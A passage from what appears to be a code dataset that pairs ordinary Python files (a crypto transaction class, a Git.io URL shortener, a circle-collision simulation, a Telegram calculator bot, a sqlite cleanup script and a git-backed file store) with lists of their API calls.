:param transaction: transaction (dict)
:return: (Delegate)
"""
self = cls(transaction["fee"], _error_use_class_method=False)
self._sender_public_key = transaction["senderPublicKey"]
self._timestamp = transaction["timestamp"]
self._asset["delegate"] = transaction["asset"]["delegate"]
self.sign_from_dict(transaction)
return self
def _handle_transaction_type(self, buffer):
buffer.write_bytes(self._asset["delegate"]["username"].encode())
return buffer
|
[
"bpl_lib.crypto.Keys.Keys"
] |
[((1224, 1236), 'bpl_lib.crypto.Keys.Keys', 'Keys', (['secret'], {}), '(secret)\n', (1228, 1236), False, 'from bpl_lib.crypto.Keys import Keys\n')]
|
from pyshorteners.base import BaseShortener
from pyshorteners.exceptions import ShorteningErrorException
class Shortener(BaseShortener):
"""Git.io shortener Implementation
Example:
>>> import pyshorteners
>>> s = pyshorteners.Shortener(code='12345')
>>> s.gitio.short('https://github.com/TEST')
'https://git.io/12345'
>>> s.gitio.expand('https://git.io/12345')
'https://github.com/TEST'
"""
api_url = "https://git.io"
def short(self, url):
"""Short implementation for Git.io
Only works for github urls
Args:
url (str): the URL you want to shorten
code (str): (Optional) Custom permalink code: Eg.: test
Returns:
str: The shortened URL
Raises:
ShorteningErrorException: If the API returns an error as response
"""
code = None
try:
code = self.code
except AttributeError:
pass
shorten_url = self.api_url
data = {"url": url, "code": code}
response = self._post(shorten_url, data=data)
if not response.ok:
raise ShorteningErrorException(response.content)
if not response.headers.get("Location"):
raise ShorteningErrorException(response.content)
return response.headers["Location"]
|
[
"pyshorteners.exceptions.ShorteningErrorException"
] |
[((1174, 1216), 'pyshorteners.exceptions.ShorteningErrorException', 'ShorteningErrorException', (['response.content'], {}), '(response.content)\n', (1198, 1216), False, 'from pyshorteners.exceptions import ShorteningErrorException\n'), ((1285, 1327), 'pyshorteners.exceptions.ShorteningErrorException', 'ShorteningErrorException', (['response.content'], {}), '(response.content)\n', (1309, 1327), False, 'from pyshorteners.exceptions import ShorteningErrorException\n')]
|
import ABCLogger, pygame as py, numpy, itertools
from Numerical import Numerical
from global_values import *
class CirclesLogger(ABCLogger.ABCLogger):
def log(self, foreignSelf):
return repr(foreignSelf._nextCollisionTime)
class Circles:
def expectedTimeCircles(self, circleA, circleB):
#TODO refactor this to work without self.time and move it as an unbound method to Circle class
positionDifference = circleA.currentPosition(self.time) - circleB.currentPosition(self.time)
velocityDifference = circleA.velocity - circleB.velocity
radiiSum = circleA.radius + circleB.radius
leadingCoefficient = velocityDifference[0]**2 + velocityDifference[1]**2
middleCoefficient = 2*(velocityDifference[0]*positionDifference[0] + velocityDifference[1]*positionDifference[1])
constantCoefficient = positionDifference[0]**2 + positionDifference[1]**2 - radiiSum**2
return Numerical.solveQuadraticPrune([leadingCoefficient, middleCoefficient, constantCoefficient]) + self.time
def expectedTimeWalls(self, circle): # the order is East, West, North, South
wallsHorizontal = [circle.radius, width - circle.radius]
wallsVertical = [circle.radius, height - circle.radius]
for horizontal in wallsHorizontal:
solution = Numerical.solveLinear([circle.velocity[0], circle.currentPosition(self.time)[0] - horizontal])
yield solution + self.time
for vertical in wallsVertical:
solution = Numerical.solveLinear([circle.velocity[1], circle.currentPosition(self.time)[1] - vertical])
yield solution + self.time
@staticmethod
def newVelocitiesCircles(circleA, circleB):
normalVector = circleB.position - circleA.position
commonFactor = normalVector/numpy.dot(normalVector, normalVector)
normalComponentA = numpy.dot(circleA.velocity, normalVector)*commonFactor
normalComponentB = numpy.dot(circleB.velocity, normalVector)*commonFactor
circleANewVelocity = circleA.velocity - normalComponentA + normalComponentB
circleBNewVelocity = circleB.velocity - normalComponentB + normalComponentA
return circleANewVelocity, circleBNewVelocity
@staticmethod
def naiveCollisionCheck(circleA, circleB):
positionDifference = circleB.position - circleA.position
distance = numpy.linalg.norm(positionDifference)
radiiSum = circleA.radius + circleB.radius
return distance < radiiSum
def isWithinCurrentTimeslice(self, time):
return time > self.time and time < self.time + 1
@property
def circlesNo(self):
return len(self.circles)
def __init__(self, circles):
self.circles = circles
self.time = 0
self.circleCircle = numpy.ndarray(shape=([self.circlesNo]*2), dtype = float)
self.circleWall = numpy.ndarray(shape=([self.circlesNo, wallsNumber]), dtype = float) # the order is East, West, North, South
self.circleCircle.fill(float("inf"))
#properties of the next collision. To be modified exlusively by self.whenNextCollision:
self._nextCollisionTime = 0
self._isPairOfCircles = False
self._i = (None, None) # can be (int, int) or (int,)
self.allPairsCollisions()
self.allWallsCollisions()
self.whenNextCollision()
def allWallsCollisions(self):
for circleIndex in range(self.circlesNo):
self.updateCircleWallEntry(circleIndex)
def updateCircleWallEntry(self, circleIndex):
for wallIndex, time in enumerate(self.expectedTimeWalls(self.circles[circleIndex])):
self.circleWall[circleIndex][wallIndex] = time
def allPairsCollisions(self):
for indices in self.yieldPairsIndices():
self.updateCircleCircleEntry(indices)
def updateCircleCircleEntry(self, circlesIndices):
self.circleCircle[circlesIndices] = self.expectedTimeCircles(*(self.circles[index] for index in circlesIndices))
def yieldPairsIndices(self):
for xIndex in range(0, self.circlesNo - 1):
for yIndex in range(xIndex + 1, self.circlesNo):
yield xIndex, yIndex
def soonestCircleCircleCollision(self):
minimum = float("+inf")
indices = None
for pair in self.yieldPairsIndices():
time = float(self.circleCircle[pair])
if time < minimum:
minimum = time
indices = pair
return indices, minimum
def soonestCircleWallCollision(self):
minimum = float("+inf")
index = None
for circleIndex in range(self.circlesNo):
for wallIndex in range(wallsNumber):
time = float(self.circleWall[circleIndex, wallIndex])
if time < minimum:
minimum = time
index = circleIndex, wallIndex
return index, minimum
def whenNextCollision(self): # Side efects :(. This function should be exlusive for changing that attributes.
circles = self.soonestCircleCircleCollision()
wall = self.soonestCircleWallCollision()
if circles[1] < wall[1]:
self._isPairOfCircles = True
self._i = circles[0]
self._nextCollisionTime = circles[1]
else:
self._isPairOfCircles = False
self._i = wall[0]
self._nextCollisionTime = wall[1]
def carryOutCircleCollision(self):
assert self._isPairOfCircles == True
circles = tuple(self.circles[i] for i in self._i)
newVelocities = self.newVelocitiesCircles(*circles)
for i, circle in enumerate(circles):
circle.position = circle.currentPosition(self._nextCollisionTime)
circle.velocity = newVelocities[i]
circle.time = float(self._nextCollisionTime)
for i in self._i:
self.updateCircleWallEntry(i)
self.circleCircle[self._i] = float("+inf")
for pairIndex in itertools.chain(self.yieldPairsForIndex(*self._i), self.yieldPairsForIndex(*self._i[::-1])):
self.updateCircleCircleEntry(pairIndex)
def carryOutWallCollision(self):
assert self._isPairOfCircles == False
if self._i[1] in [0, 1]:
component = 0
else:
component = 1
circle = self.circles[self._i[0]]
circle.position = circle.currentPosition(self._nextCollisionTime)
circle.velocity[component] *= -1
circle.time = float(self._nextCollisionTime)
self.updateCircleWallEntry(self._i[0])
self.circleWall[self._i] = float("+inf")
for pairIndex in self.yieldPairsForIndex(*[self._i[0]]*2):
self.updateCircleCircleEntry(pairIndex)
#vim mark X set here.
def carryOutCollision(self):
assert self.isWithinCurrentTimeslice(self._nextCollisionTime)
if self._isPairOfCircles:
self.carryOutCircleCollision()
else:
self.carryOutWallCollision()
def animationStep(self):
if self.isWithinCurrentTimeslice(self._nextCollisionTime):
self.carryOutCollision()
self.whenNextCollision()
else:
self.time += 1
def yieldPairsForIndex(self, index, withoutIndex):
for i in range(index):
if i != withoutIndex:
yield i, index
for i in range(index + 1, self.circlesNo):
if i != withoutIndex:
yield index, i
def animate(self):
while True:
queue = py.event.get()
for event in queue:
if event.type == py.QUIT:
quit()
screen.fill([0,0,0])
[circle.plot(self.time) for circle in self.circles]
py.display.update()
self.animationStep()
|
[
"pygame.event.get",
"Numerical.Numerical.solveQuadraticPrune",
"pygame.display.update",
"numpy.linalg.norm",
"numpy.dot",
"numpy.ndarray"
] |
[((2195, 2232), 'numpy.linalg.norm', 'numpy.linalg.norm', (['positionDifference'], {}), '(positionDifference)\n', (2212, 2232), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((2562, 2616), 'numpy.ndarray', 'numpy.ndarray', ([], {'shape': '([self.circlesNo] * 2)', 'dtype': 'float'}), '(shape=[self.circlesNo] * 2, dtype=float)\n', (2575, 2616), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((2639, 2702), 'numpy.ndarray', 'numpy.ndarray', ([], {'shape': '[self.circlesNo, wallsNumber]', 'dtype': 'float'}), '(shape=[self.circlesNo, wallsNumber], dtype=float)\n', (2652, 2702), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((878, 973), 'Numerical.Numerical.solveQuadraticPrune', 'Numerical.solveQuadraticPrune', (['[leadingCoefficient, middleCoefficient, constantCoefficient]'], {}), '([leadingCoefficient, middleCoefficient,\n constantCoefficient])\n', (907, 973), False, 'from Numerical import Numerical\n'), ((1668, 1705), 'numpy.dot', 'numpy.dot', (['normalVector', 'normalVector'], {}), '(normalVector, normalVector)\n', (1677, 1705), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((1727, 1768), 'numpy.dot', 'numpy.dot', (['circleA.velocity', 'normalVector'], {}), '(circleA.velocity, normalVector)\n', (1736, 1768), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((1803, 1844), 'numpy.dot', 'numpy.dot', (['circleB.velocity', 'normalVector'], {}), '(circleB.velocity, normalVector)\n', (1812, 1844), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((6631, 6645), 'pygame.event.get', 'py.event.get', ([], {}), '()\n', (6643, 6645), True, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((6793, 6812), 'pygame.display.update', 'py.display.update', ([], {}), '()\n', (6810, 6812), True, 'import ABCLogger, pygame as py, numpy, itertools\n')]
|
"""Module of definition controller."""
import logging
from collections import defaultdict
from threading import Lock
from typing import DefaultDict
from uuid import uuid4
from telegram import (InlineKeyboardMarkup, InlineQueryResultArticle,
InputTextMessageContent, Update)
from telegram.ext import (CallbackContext, CallbackQueryHandler,
CommandHandler, InlineQueryHandler, Updater)
from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton
from telegram.message import Message
from telegram.parsemode import ParseMode
from calculator_bot.service.calculator import CalculatorService
class TelegramCalculatorController:
"""Definition Controller for telegram bot inline queries."""
def __init__(self, token: str, service: CalculatorService) -> None:
self.token = token
self.service = service
self.locks: DefaultDict[str, Lock] = defaultdict(Lock)
def start(self, update: Update, context: CallbackContext) -> None:
"""Send a message when the command /start is issued."""
if update.message is not None:
update.message.reply_text(
'Hi! Try to create a new calculator using /new command')
def help_command(self, update: Update, context: CallbackContext) -> None:
"""Send a message when the command /help is issued."""
if update.message is not None:
update.message.reply_text('Help!')
def new_command(self, update: Update, context: CallbackContext) -> None:
"""Send a calculator message when the command /new is issued."""
if update.message is not None:
update.message.reply_text(
'__Start typing number to calculate__',
parse_mode=ParseMode.MARKDOWN,
reply_markup=self.create_inline_markup_keyboard()
)
def inlinequery(self, update: Update, context: CallbackContext) -> None:
"""Handle the inline query."""
if update.inline_query is not None:
results = [
InlineQueryResultArticle(
id=str(uuid4()),
title='Create new calculator',
input_message_content=InputTextMessageContent(
'__Start typing number to calculate__',
parse_mode=ParseMode.MARKDOWN
),
reply_markup=self.create_inline_markup_keyboard()
)
]
update.inline_query.answer(results)
def callbackquery(self, update: Update, context: CallbackContext) -> None:
"""Handle the callback queries."""
if update.callback_query:
message_id: str = str(update.callback_query.message.message_id \
if update.callback_query.message \
else update.callback_query.inline_message_id)
locked = self.locks[message_id].locked()
expr = update.callback_query.data
if not expr:
logging.debug(
'failed answering callback query with empty expression')
return
result = self.service.get_or_create_calculator(str(message_id))
if result.is_err:
logging.error(
'failed get or creating calculator for message: %s',
result.unwrap_err()
)
return
result = self.service.evaluate_calculator_expression(
result.unwrap(), expr
)
if result.is_err:
logging.error(
'failed evaluating calculator expression: %s', result.unwrap_err())
return
calc = result.unwrap()
text = ('%g' % calc.value).ljust(50)
text += ('\n> %s' % calc.expr)
if update.callback_query.message:
if text != update.callback_query.message.text:
message = update.callback_query.message.edit_text(
text,
reply_markup=self.create_inline_markup_keyboard()
)
if not isinstance(message, Message):
logging.error(
'failed editing callback message: %s', message)
else:
message = context.bot.edit_message_text(
text,
inline_message_id=message_id,
reply_markup=self.create_inline_markup_keyboard()
)
if not isinstance(message, Message):
logging.error(
'failed editing callback message: %s', message)
if locked:
self.locks[message_id].release()
def create_inline_markup_keyboard(self) -> InlineKeyboardMarkup:
"""Creates inline keyboard markup for calculators."""
return InlineKeyboardMarkup([
[
InlineKeyboardButton('7', callback_data='7'),
InlineKeyboardButton('8', callback_data='8'),
InlineKeyboardButton('9', callback_data='9'),
InlineKeyboardButton('*', callback_data='*'),
InlineKeyboardButton('/', callback_data='/')
],
[
InlineKeyboardButton('4', callback_data='4'),
InlineKeyboardButton('5', callback_data='5'),
InlineKeyboardButton('6', callback_data='6'),
InlineKeyboardButton('+', callback_data='+'),
InlineKeyboardButton('-', callback_data='-')
],
[
InlineKeyboardButton('1', callback_data='1'),
InlineKeyboardButton('2', callback_data='2'),
InlineKeyboardButton('3', callback_data='3'),
InlineKeyboardButton('=', callback_data='='),
InlineKeyboardButton('c', callback_data='c'),
],
[
InlineKeyboardButton('0', callback_data='0'),
InlineKeyboardButton('.', callback_data='.'),
]
])
def run(self) -> None:
"""Run the bot."""
updater = Updater(self.token)
me_info = updater.bot.get_me()
logging.info('Starting updater for bot: %s', me_info)
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
# on different commands - answer in Telegram
dispatcher.add_handler(CommandHandler("start", self.start))
dispatcher.add_handler(CommandHandler("help", self.help_command))
dispatcher.add_handler(CommandHandler("new", self.new_command))
# on non command i.e message - echo the message on Telegram
dispatcher.add_handler(InlineQueryHandler(self.inlinequery))
dispatcher.add_handler(CallbackQueryHandler(self.callbackquery))
# Start the Bot
updater.start_polling()
# Block until the user presses Ctrl-C or the process receives SIGINT,
# SIGTERM or SIGABRT. This should be used most of the time, since
# start_polling() is non-blocking and will stop the bot gracefully.
updater.idle()
|
[
"logging.error",
"uuid.uuid4",
"logging.debug",
"telegram.ext.CallbackQueryHandler",
"telegram.ext.InlineQueryHandler",
"telegram.InputTextMessageContent",
"collections.defaultdict",
"logging.info",
"telegram.ext.Updater",
"telegram.inline.inlinekeyboardbutton.InlineKeyboardButton",
"telegram.ext.CommandHandler"
] |
[((926, 943), 'collections.defaultdict', 'defaultdict', (['Lock'], {}), '(Lock)\n', (937, 943), False, 'from collections import defaultdict\n'), ((6224, 6243), 'telegram.ext.Updater', 'Updater', (['self.token'], {}), '(self.token)\n', (6231, 6243), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6291, 6344), 'logging.info', 'logging.info', (['"""Starting updater for bot: %s"""', 'me_info'], {}), "('Starting updater for bot: %s', me_info)\n", (6303, 6344), False, 'import logging\n'), ((6521, 6556), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""start"""', 'self.start'], {}), "('start', self.start)\n", (6535, 6556), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6589, 6630), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""help"""', 'self.help_command'], {}), "('help', self.help_command)\n", (6603, 6630), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6663, 6702), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""new"""', 'self.new_command'], {}), "('new', self.new_command)\n", (6677, 6702), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6804, 6840), 'telegram.ext.InlineQueryHandler', 'InlineQueryHandler', (['self.inlinequery'], {}), '(self.inlinequery)\n', (6822, 6840), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((6873, 6913), 'telegram.ext.CallbackQueryHandler', 'CallbackQueryHandler', (['self.callbackquery'], {}), '(self.callbackquery)\n', (6893, 6913), False, 'from telegram.ext import CallbackContext, CallbackQueryHandler, CommandHandler, InlineQueryHandler, Updater\n'), ((3031, 3101), 'logging.debug', 'logging.debug', (['"""failed answering callback query with empty expression"""'], {}), "('failed answering callback query with empty expression')\n", (3044, 3101), False, 'import logging\n'), ((4644, 4705), 'logging.error', 'logging.error', (['"""failed editing callback message: %s"""', 'message'], {}), "('failed editing callback message: %s', message)\n", (4657, 4705), False, 'import logging\n'), ((5003, 5047), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""7"""'], {'callback_data': '"""7"""'}), "('7', callback_data='7')\n", (5023, 5047), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5065, 5109), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""8"""'], {'callback_data': '"""8"""'}), "('8', callback_data='8')\n", (5085, 5109), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5127, 5171), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""9"""'], {'callback_data': '"""9"""'}), "('9', callback_data='9')\n", (5147, 5171), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5189, 5233), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""*"""'], {'callback_data': '"""*"""'}), "('*', callback_data='*')\n", (5209, 5233), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5251, 5295), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""/"""'], {'callback_data': '"""/"""'}), "('/', callback_data='/')\n", (5271, 5295), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5341, 5385), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""4"""'], {'callback_data': '"""4"""'}), "('4', callback_data='4')\n", (5361, 5385), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5403, 5447), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""5"""'], {'callback_data': '"""5"""'}), "('5', callback_data='5')\n", (5423, 5447), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5465, 5509), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""6"""'], {'callback_data': '"""6"""'}), "('6', callback_data='6')\n", (5485, 5509), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5527, 5571), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""+"""'], {'callback_data': '"""+"""'}), "('+', callback_data='+')\n", (5547, 5571), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5589, 5633), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""-"""'], {'callback_data': '"""-"""'}), "('-', callback_data='-')\n", (5609, 5633), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5679, 5723), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""1"""'], {'callback_data': '"""1"""'}), "('1', callback_data='1')\n", (5699, 5723), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5741, 5785), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""2"""'], {'callback_data': '"""2"""'}), "('2', callback_data='2')\n", (5761, 5785), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5803, 5847), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""3"""'], {'callback_data': '"""3"""'}), "('3', callback_data='3')\n", (5823, 5847), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5865, 5909), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""="""'], {'callback_data': '"""="""'}), "('=', callback_data='=')\n", (5885, 5909), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((5927, 5971), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""c"""'], {'callback_data': '"""c"""'}), "('c', callback_data='c')\n", (5947, 5971), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((6018, 6062), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""0"""'], {'callback_data': '"""0"""'}), "('0', callback_data='0')\n", (6038, 6062), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((6080, 6124), 'telegram.inline.inlinekeyboardbutton.InlineKeyboardButton', 'InlineKeyboardButton', (['"""."""'], {'callback_data': '"""."""'}), "('.', callback_data='.')\n", (6100, 6124), False, 'from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton\n'), ((2228, 2327), 'telegram.InputTextMessageContent', 'InputTextMessageContent', (['"""__Start typing number to calculate__"""'], {'parse_mode': 'ParseMode.MARKDOWN'}), "('__Start typing number to calculate__', parse_mode=\n ParseMode.MARKDOWN)\n", (2251, 2327), False, 'from telegram import InlineKeyboardMarkup, InlineQueryResultArticle, InputTextMessageContent, Update\n'), ((4241, 4302), 'logging.error', 'logging.error', (['"""failed editing callback message: %s"""', 'message'], {}), "('failed editing callback message: %s', message)\n", (4254, 4302), False, 'import logging\n'), ((2125, 2132), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (2130, 2132), False, 'from uuid import uuid4\n')]
|
#! /usr/bin/env python3
# <NAME>, 2020
# proc6a.py 2020-11-18 2020-11-19 1.1
# АСАП, КААП
# обработка бард-афиши, обработка базы DBMS sqlite3, архивист: М.Колодин
import sqlite3
db = 'apx.db'
conn = sqlite3.connect(db)
curr = conn.cursor()
curw = conn.cursor()
rep = 0
err = 0
for row in curr.execute('select * from data order by datesql asc, time asc'):
# if rep > 1: break
rep += 1
print(rep % 10, end="", flush=True)
a = list(row)
id = a[0]
# ~ print(id, end=", ")
# ~ print(len(a))
for i in range(1, len(a)):
a[i] = a[i].strip()
a[i] = a[i].replace('\n', ' ')
a[i] = a[i].replace('\r', ' ')
a[i] = a[i].replace('\t', ' ')
sql = """update data set
wd = ?,
year = ?,
date = ?,
datesql = ?,
time = ?,
city = ?,
place = ?,
what = ?,
desc = ?,
source = ?,
status = ?,
shown = ?,
uuid = ?
where id = ?
"""
dats = a[1:] + [a[0]]
# ~ print(sql, dats, "len:", len(dats))
curw.execute(sql, dats)
conn.commit()
conn.close()
print(f"\nобработано событий: {rep}, ошибок: {err}\n")
|
[
"sqlite3.connect"
] |
[((204, 223), 'sqlite3.connect', 'sqlite3.connect', (['db'], {}), '(db)\n', (219, 223), False, 'import sqlite3\n')]
|
#!/usr/bin/env python3
import os
from subprocess import Popen, PIPE
import sys
def gitStoreLink(git_store, List, verbose=False):
if not os.path.isdir(git_store):
if verbose: print('mkdir ' + str(git_store))
os.mkdir(git_store, 0o755)
for f in List:
gfile = git_store + f
if not os.path.isdir(os.path.dirname(gfile)):
if verbose: print('mkdir ' + str(os.path.dirname(gfile)))
os.mkdir(os.path.dirname(gfile), 0o755)
if not os.path.isfile(gfile):
if verbose: print('link ' + str(gfile))
os.link(f, gfile)
return True
def gitStoreInit(git_store, verbose=False):
if not os.path.isdir(git_store):
if verbose: print('mkdir ' + str(git_store))
os.mkdir(git_store, 0o755)
if not os.path.isdir(git_store + '/.git'):
if verbose: print('git init ' + str(git_store))
cmd = 'git init ' + str(git_store)
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
#os.chdir(git_store)
return True
def gitStoreAdd(git_store, f, verbose=False):
try:
os.chdir(git_store)
except FileNotFoundError as e:
if verbose: print('FileNotFoundError: ' + str(e))
return 'FileNotFoundError: ' + str(e)
if not os.access(f, os.F_OK):
if verbose: print('Not Found: ' + str(f))
return 'Not Found: ' + str(f)
elif not os.access(f, os.R_OK):
if verbose: print('No Access: ' + str(f))
return 'No Access: ' + str(f)
cmd = 'git add ' + git_store + f
if verbose: print('git add ' + git_store + f)
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
exit_code = proc.wait()
if verbose:
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
print(str(exit_code))
return stdout, stderr, exit_code
def gitStoreDel(git_store, f, verbose=False):
os.chdir(git_store)
if verbose: print('git rm ' + git_store + f)
cmd = 'git rm -f ' + git_store + f
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
if os.path.exists(git_store + f):
if verbose: print('remove ' + git_store + f)
os.remove(git_store + f)
git_commit = gitStoreCommit(git_store, f, verbose=True)
return True
def gitStoreCommit(git_store, f, verbose=False):
os.chdir(git_store)
if verbose: print('git commit me ' + git_store + f)
#import shlex
#shlex.split(cmd)
#cmd = 'git commit -m "sentinel" ' + git_store + f
#proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
cmd = ['git', 'commit', '-m', '"sentinel ' + str(f) + '"', git_store + f ]
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
exit_code = proc.wait()
if verbose:
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
print(str(exit_code))
return stdout, stderr, exit_code
def gitStoreStatus(git_store, verbose=False):
try:
os.chdir(git_store)
except FileNotFoundError as e:
if verbose: print('FileNotFoundError: ' + str(e))
return 'FileNotFoundError: ' + str(e)
cmd = 'git status'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
exit_code = proc.wait()
if verbose:
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
print(str(exit_code))
return stdout, stderr, exit_code
def gitStoreLsFiles(git_store, verbose=False):
try:
os.chdir(git_store)
except FileNotFoundError as e:
if verbose: print('FileNotFoundError: ' + str(e))
return 'FileNotFoundError: ' + str(e)
cmd = 'git ls-files'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
exit_code = proc.wait()
if verbose:
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
print(str(exit_code))
return stdout, stderr, exit_code
def gitStoreLog(git_store, verbose=False):
try:
os.chdir(git_store)
except FileNotFoundError as e:
if verbose: print('FileNotFoundError: ' + str(e))
return 'FileNotFoundError: ' + str(e)
cmd = 'git log'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
return proc.stdout.readlines()
def gitStoreClearHistory(git_store, verbose=False):
os.chdir(git_store)
cmd = 'git checkout --orphan temp_branch'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
cmd = 'git add -A'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
cmd = ['git','commit','-am "sentinel re-commit"']
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
cmd = 'git branch -D master'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
cmd = 'git branch -m master'
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
if verbose:
for line in proc.stdout.readlines():
print(line.decode('utf-8').strip('\n'))
#cmd = 'git push -f origin master'
#proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
#if verbose:
# for line in proc.stdout.readlines():
# print(line.decode('utf-8').strip('\n'))
return True
#import mimetypes
#mime = mimetypes.guess_type(file)
def fileType(_file):
try:
with open(_file, 'r', encoding='utf-8') as f:
f.read(4)
return 'text'
except UnicodeDecodeError:
return 'binary'
def gitStoreDiff(git_store, f=None, verbose=False):
try:
os.chdir(git_store)
except FileNotFoundError as e:
if verbose: print('FileNotFoundError: ' + str(e))
return 'FileNotFoundError: ' + str(e)
if f is None:
f = ''
cmd = 'git diff ' + f
proc = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
exit_code = proc.wait()
if verbose:
print(stdout.decode('utf-8'))
print(stderr.decode('utf-8'))
print(str(exit_code))
return stdout, stderr, exit_code
if __name__ == '__main__':
git_store = '/opt/sentinel/db/git/dir2'
L = [ '/etc/hosts', '/etc/ssh/sshd_config' ]
git_init = gitStoreInit(git_store)
git_link = gitStoreLink(git_store, L)
#for f in L:
# git_add = gitStoreAdd(git_store, f)
# git_commit = gitStoreCommit(git_store, f)
if sys.argv[1:]:
if sys.argv[1] == 'git-status':
git_status = gitStoreStatus(git_store, verbose=True)
if sys.argv[1] == 'git-files':
git_files = gitStoreLsFiles(git_store, verbose=True)
if sys.argv[1] == 'git-log':
git_log = gitStoreLog(git_store, verbose=True)
if sys.argv[1] == 'git-add':
_file = sys.argv[2]
if not os.access(_file, os.F_OK):
print('Not Found: ' + str(_file))
sys.exit(1)
elif not os.access(_file, os.R_OK):
print('No Access: ' + str(_file))
sys.exit(1)
git_link = gitStoreLink(git_store, [_file], verbose=True)
git_add = gitStoreAdd(git_store, _file, verbose=True)
git_commit = gitStoreCommit(git_store, _file, verbose=True)
if sys.argv[1] == 'git-del':
_file = sys.argv[2]
